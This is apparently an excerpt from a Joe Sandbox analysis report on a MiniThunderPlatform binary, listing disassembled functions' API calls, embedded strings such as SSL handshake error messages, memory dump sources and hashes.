                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000456000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614158449.000000000045A000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614181616.000000000045C000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@_V?$allocator@_W@2@@std@@W@std@@$D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@_$??1?$basic_string@CloseHandle$??0?$basic_string@?data@?$basic_string@_$?assign@?$basic_string@?data@?$basic_string@?size@?$basic_string@_CreateErrorLastMutexPrivateProfileStringV01@V12@V12@@Y?$basic_string@_
                                                                                                                                              • String ID: 80000055$80000055$d:\minitp\src\minithunderplatform\src\minithunderplatform\downloadenginemanager.cpp$id.dat$m_pDownloadHandler != NULL$new memory failed!$partner
                                                                                                                                              • API String ID: 3560328190-4013534387
                                                                                                                                              • Opcode ID: 986f56804711b03c73e397735637d0ed4fd007bd5bc1be961d5c07aae9c22e3f
                                                                                                                                              • Instruction ID: aee5c3c6f2a24da616a00a300bf2f9990c53a6ad5f18dc2c1bdde4f1044f440a
                                                                                                                                              • Opcode Fuzzy Hash: 986f56804711b03c73e397735637d0ed4fd007bd5bc1be961d5c07aae9c22e3f
                                                                                                                                              • Instruction Fuzzy Hash: 990261B1D00218DFDB14EB94D985BEEBBB1AF08308F51419EE50577351CB789E84CBAA

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 100261B0: __EH_prolog.LIBCMT ref: 100261B5
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?), ref: 100261DE
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,?), ref: 1002620C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 10026226
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1002623C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1002625A
                                                                                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 1003C240
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 1003C5FF
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 100261F4
                                                                                                                                                • Part of subcall function 10038B50: RtlEnterCriticalSection.NTDLL(?), ref: 10038B8A
                                                                                                                                                • Part of subcall function 10038B50: RtlLeaveCriticalSection.NTDLL(?), ref: 10038BA7
                                                                                                                                                • Part of subcall function 10038B50: ??3@YAXPAX@Z.MSVCR71(?), ref: 10038BE7
                                                                                                                                                • Part of subcall function 100394E0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,00000002,10242D17,000000FF,1003AABE,00000000,?), ref: 10039500
                                                                                                                                                • Part of subcall function 100394E0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1003951D
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 1003C315
                                                                                                                                              • GetTickCount.KERNEL32 ref: 1003C333
                                                                                                                                                • Part of subcall function 10039640: ??0?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@H@Z.MSVCP71(00000003,00000001,00000000,00000000,?,?), ref: 10039669
                                                                                                                                                • Part of subcall function 10039640: ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@D@Z.MSVCP71(00000000,?,?), ref: 1003969A
                                                                                                                                                • Part of subcall function 10039640: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@G@Z.MSVCP71 ref: 100396A5
                                                                                                                                                • Part of subcall function 10039640: ?str@?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@2@XZ.MSVCP71(?), ref: 100396B4
                                                                                                                                                • Part of subcall function 10039640: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100396FC
                                                                                                                                                • Part of subcall function 10039640: ?str@?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@2@XZ.MSVCP71(?), ref: 10039713
                                                                                                                                                • Part of subcall function 10039640: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000), ref: 10039737
                                                                                                                                                • Part of subcall function 10039640: ??_D?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXXZ.MSVCP71 ref: 10039775
                                                                                                                                              • ??0?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@H@Z.MSVCP71(?,00000003,00000001,?,?), ref: 1003C370
                                                                                                                                              • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV01@AAH@Z.MSVCP71(?), ref: 1003C387
                                                                                                                                              • ??$?5DU?$char_traits@D@std@@@std@@YAAAV?$basic_istream@DU?$char_traits@D@std@@@0@AAV10@AAD@Z.MSVCP71(?,?), ref: 1003C3C5
                                                                                                                                              • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV01@AAH@Z.MSVCP71(?), ref: 1003C3F0
                                                                                                                                              • ??$?5DU?$char_traits@D@std@@@std@@YAAAV?$basic_istream@DU?$char_traits@D@std@@@0@AAV10@AAD@Z.MSVCP71(?,0000002E), ref: 1003C427
                                                                                                                                              • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV01@AAH@Z.MSVCP71(?), ref: 1003C452
                                                                                                                                              • ??$?5DU?$char_traits@D@std@@@std@@YAAAV?$basic_istream@DU?$char_traits@D@std@@@0@AAV10@AAD@Z.MSVCP71(?,0000002E), ref: 1003C489
                                                                                                                                              • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV01@AAH@Z.MSVCP71(?), ref: 1003C4B4
                                                                                                                                              • ??$?5DU?$char_traits@D@std@@@std@@YAAAV?$basic_istream@DU?$char_traits@D@std@@@0@AAV10@AAD@Z.MSVCP71(?,0000002E), ref: 1003C4DF
                                                                                                                                              • ??$?5DU?$char_traits@D@std@@@std@@YAAAV?$basic_istream@DU?$char_traits@D@std@@@0@AAV10@AAD@Z.MSVCP71(?,0000002E), ref: 1003C503
                                                                                                                                              • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP71(?,00000006,?,?,?,?,?,?,?,?,?,?), ref: 1003C52E
                                                                                                                                              • ??_D?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXXZ.MSVCP71 ref: 1003C540
                                                                                                                                              • inet_addr.WS2_32(?), ref: 1003C55F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                               • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                               • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                               • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                               • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                               • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@$D@std@@V?$allocator@$D@2@@std@@$D@std@@@std@@$D@std@@@0@V10@$??$?5??0?$basic_string@??1?$basic_string@V01@V?$basic_istream@$??5?$basic_istream@CriticalSection$V?$basic_string@$??0?$basic_stringstream@?str@?$basic_stringstream@D?$basic_stringstream@D@2@@2@EnterLeaveV12@$??$?6??3@??6?$basic_ostream@?assign@?$basic_string@?erase@?$basic_string@CountD@2@@1@H_prologTickV01@@V12@@V?$basic_ostream@inet_addr
                                                                                                                                              • String ID: .$.\connect_manager.cpp$operation_ptr$operation_ptr->is_pending()$operation_ptr->operate_handle()$thunder_assert
                                                                                                                                              • API String ID: 2892529491-448779732
                                                                                                                                              • Opcode ID: 96a354738191216a438755716dd35a6bb5446e3b4b29c8acb274d9aa9fdb954d
                                                                                                                                              • Instruction ID: 4502c98bd26b749bc907510b7fbd07085122e3dccc633c2a77dda873a4d72846
                                                                                                                                              • Opcode Fuzzy Hash: 96a354738191216a438755716dd35a6bb5446e3b4b29c8acb274d9aa9fdb954d
                                                                                                                                              • Instruction Fuzzy Hash: DCD1AF751083858FC321CF25C884F9BBBE5FF99705F048A1DE4898B292D730E989CB92

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 1001EDB4
                                                                                                                                                • Part of subcall function 1000104F: RtlEnterCriticalSection.NTDLL(?), ref: 1000105C
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000010,?,7C3869BF,1001F7E0), ref: 1001EDF0
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001EE00
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001EE10
                                                                                                                                              • GetPrivateProfileSectionNamesA.KERNEL32(?,00005000,?), ref: 1001EE35
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 1001EE50
                                                                                                                                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP71(_once,00000000), ref: 1001EE67
                                                                                                                                              • GetPrivateProfileSectionA.KERNEL32(?,?,00005000,?), ref: 1001EE97
                                                                                                                                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(?), ref: 1001EEB7
                                                                                                                                              • ?find_first_of@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIDI@Z.MSVCP71(0000003D,00000000), ref: 1001EEC7
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP71(?,00000000,00000000), ref: 1001EEE3
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP71(?,?,?), ref: 1001EF07
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 1001EF14
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?,?,?), ref: 1001EF44
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001EF54
                                                                                                                                              • strlen.MSVCR71(?), ref: 1001EF5B
                                                                                                                                              • strlen.MSVCR71(?), ref: 1001EF6F
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001EF83
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001EFA1
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001EFB1
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001EFC1
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 1001EFD1
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                               • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                               • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                               • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                               • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                               • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@V12@$Section$?assign@?$basic_string@$CriticalPrivateProfilestrlen$??4?$basic_string@?find@?$basic_string@?find_first_of@?$basic_string@EnterH_prologLeaveNamesV01@V12@@
                                                                                                                                              • String ID: _once
                                                                                                                                              • API String ID: 1618401751-778372043

                                                                                                                                              APIs
                                                                                                                                              • AtlComPtrAssign.ATL71(?,?), ref: 10045228
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(SSL handshake: load security library error), ref: 10045299
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B6AA0,?), ref: 100452BD
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(SSL handshake: client create credentials error), ref: 100452D9
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B6AA0,?), ref: 10045301
                                                                                                                                              • ??0exception@@QAE@ABQBD@Z.MSVCR71(?), ref: 10045427
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B2A60), ref: 10045436
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(SSL handshake: InitializeSecurityContext call error), ref: 10045443
                                                                                                                                                • Part of subcall function 100261B0: __EH_prolog.LIBCMT ref: 100261B5
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?), ref: 100261DE
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,?), ref: 1002620C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 10026226
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1002623C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1002625A
                                                                                                                                              Strings
                                                                                                                                              • .\AsynSSLSocket.cpp, xrefs: 100451A5, 1004520C
                                                                                                                                              • SSL handshake: load security library error, xrefs: 10045291
                                                                                                                                              • SSL handshake: send data to server error! throw exception, xrefs: 10045420
                                                                                                                                              • SSL handshake: InitializeSecurityContext throw exception, xrefs: 10045470
                                                                                                                                              • SSL handshake: InitializeSecurityContext call error, xrefs: 1004543B
                                                                                                                                              • _operation_ptr == NULL, xrefs: 100451AF
                                                                                                                                              • _connect_op_ptr == NULL, xrefs: 10045216
                                                                                                                                              • SSL handshake: client create credentials error, xrefs: 100452D1
                                                                                                                                              • thunder_assert, xrefs: 100451AA, 10045211
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$??1?$basic_string@ExceptionThrow$??0exception@@AssignH_prologV01@@
                                                                                                                                              • String ID: .\AsynSSLSocket.cpp$SSL handshake: InitializeSecurityContext call error$SSL handshake: InitializeSecurityContext throw exception$SSL handshake: client create credentials error$SSL handshake: load security library error$SSL handshake: send data to server error! throw exception$_connect_op_ptr == NULL$_operation_ptr == NULL$thunder_assert
                                                                                                                                              • API String ID: 2541744101-705139129

                                                                                                                                              APIs
                                                                                                                                              • ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ.MSVCP71(0000002E), ref: 00425A81
                                                                                                                                              • ?assign@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 00425AC3
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00425ADC
                                                                                                                                              • ??4?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z.MSVCP71(0x8000000), ref: 00425AF3
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00425B49
                                                                                                                                              • ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ.MSVCP71 ref: 00425B5B
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00425B85
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00425B9E
                                                                                                                                              • ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ.MSVCP71 ref: 00425BBB
                                                                                                                                              • LoadLibraryW.KERNEL32(00000000), ref: 00425BCB
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,get_peer_id_ex), ref: 00425BF0
                                                                                                                                              • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEABDI@Z.MSVCP71(00000000,00000010,08000000,00000010,00000000), ref: 00425C4B
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 00425C76
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 00425C93
                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00425CA6
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00425CC5
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00425CDE
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1614044465.0000000000417000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1614008254.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000456000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614158449.000000000045A000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614181616.000000000045C000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@_V?$allocator@_W@2@@std@@W@std@@$??1?$basic_string@_$?data@?$basic_string@_D@2@@std@@D@std@@U?$char_traits@V?$allocator@$LibraryV12@V12@@$??1?$basic_string@??4?$basic_string@_?assign@?$basic_string@?assign@?$basic_string@_A?$basic_string@AddressFreeLoadProcV01@
                                                                                                                                              • String ID: 0x8000000$dl_peer_id.dll$get_peer_id_ex
                                                                                                                                              • API String ID: 2667674723-1076500767
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 100164E3
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000), ref: 1001650B
                                                                                                                                                • Part of subcall function 10001000: RtlInitializeCriticalSection.NTDLL(?), ref: 1000100D
                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1001653B
                                                                                                                                                • Part of subcall function 1000F850: 754B1540.VERSION(00000000), ref: 1000F8AC
                                                                                                                                                • Part of subcall function 1000F850: ??_V@YAXPAX@Z.MSVCR71(00000000,?,00000000,?,00000000,7C3869BF,7C3869BF), ref: 1000F8E8
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(product_release_id,?,?,?,7C3869BF), ref: 100165BC
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(env,?,?,?,7C3869BF), ref: 100165D2
                                                                                                                                                • Part of subcall function 100162A0: __EH_prolog.LIBCMT ref: 100162A5
                                                                                                                                                • Part of subcall function 100162A0: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,?,?,?,00000000,?,00000014,env), ref: 10016309
                                                                                                                                                • Part of subcall function 100162A0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,00000000,?,00000014,env), ref: 10016316
                                                                                                                                                • Part of subcall function 100162A0: RtlLeaveCriticalSection.NTDLL(?), ref: 10016323
                                                                                                                                                • Part of subcall function 100162A0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,00000000,?,00000014,env), ref: 10016330
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,00000014,00000000,?,?,?,7C3869BF), ref: 100165FE
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,7C3869BF), ref: 1001660E
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?,?,7C3869BF), ref: 10016631
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?,?,?,?,7C3869BF), ref: 10016648
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?,?,?,?,7C3869BF), ref: 10016658
                                                                                                                                                • Part of subcall function 10015F72: __EH_prolog.LIBCMT ref: 10015F77
                                                                                                                                                • Part of subcall function 10015F72: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(env,10016665,?,?,?,7C3869BF), ref: 10015FA5
                                                                                                                                                • Part of subcall function 10015F72: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,7C3869BF), ref: 10015FB5
                                                                                                                                                • Part of subcall function 10015F72: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,7C3869BF), ref: 10015FC5
                                                                                                                                                • Part of subcall function 10015F72: GetPrivateProfileSectionNamesA.KERNEL32(?,00000800,?), ref: 10015FEA
                                                                                                                                                • Part of subcall function 10015F72: GetPrivateProfileSectionA.KERNEL32(?,?,00000800,?), ref: 10016020
                                                                                                                                                • Part of subcall function 10015F72: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(?), ref: 10016045
                                                                                                                                                • Part of subcall function 10015F72: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(00000000), ref: 10016052
                                                                                                                                                • Part of subcall function 10015F72: ?find_first_of@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIDI@Z.MSVCP71(0000003D,00000000), ref: 10016062
                                                                                                                                                • Part of subcall function 10015F72: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP71(?,00000000,00000000), ref: 1001607A
                                                                                                                                                • Part of subcall function 10015F72: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP71(?,00000001,?), ref: 10016098
                                                                                                                                                • Part of subcall function 10015F72: strlen.MSVCR71(00000000,?,?,00000000,?,?), ref: 10016100
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(setting_file_name,?,?,?,7C3869BF), ref: 10016670
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(env,?,?,?,7C3869BF), ref: 10016681
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,7C3869BF), ref: 100166B1
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,7C3869BF), ref: 100166C1
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,7C3869BF), ref: 100166D1
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,7C3869BF), ref: 100166E1
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
